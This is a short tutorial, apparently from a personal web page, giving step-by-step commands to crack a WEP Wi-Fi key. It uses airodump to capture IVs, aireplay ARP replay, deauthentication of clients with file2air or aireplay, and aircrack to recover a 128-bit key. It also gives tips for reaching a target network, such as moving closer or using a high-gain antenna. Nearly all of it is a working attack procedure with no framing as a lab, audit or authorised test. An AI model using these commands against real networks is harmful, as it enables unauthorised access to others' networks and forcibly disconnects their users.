First thing you will need to do is run airodump to capture the necessary IVs.

usage: airodump wlan0 <file prefix> <channel> 1

e.g.

#airodump wlan0 capture 9 1

Do NOT close down airodump, open a new shell and start aireplay:

usage:  aireplay -3 -b <Networks BSSID> -h <client MAC address> -m 68 -n 68 -d ff:ff:ff:ff:ff:ff wlan0

If you are unable to capture an ARP packet you can dissasociate the client and to force it to ARP, you can do this using file2air, open a third shell and start file2air with the following parameters:

#file2air -i wlan0 -r hostap -n 8000 -d <client MAC address> -s <APs MAC address> -b <Networks BSSID> -c <channel> -f /KNOPPIX/files/deauth.bin

or use aireplay

#aireplay -0 50 -a <AP_MAC> -c <Client_MAC> wlan0

NOTE: The channel option -c must be used with this attack

If this fails to produce an ARP you will have to try one or more of the following

Move closer to the target
Use a high gain antenna
Increase the number after the -n from 8000
Try a different .bin file, such as beacon.bin

You will need to capture approximately 1 million ivs to crack a 128-bit WEP key.  When you have done this you then run aircrack:

#aircrack capture.ivs

NOTE: It is possible to run aircrack in parallel with airodump but in practice I have found that this will not always crack the WEP key, once airodump has been stopped the WEP key is usually found in a matter of seconds.

<HOME>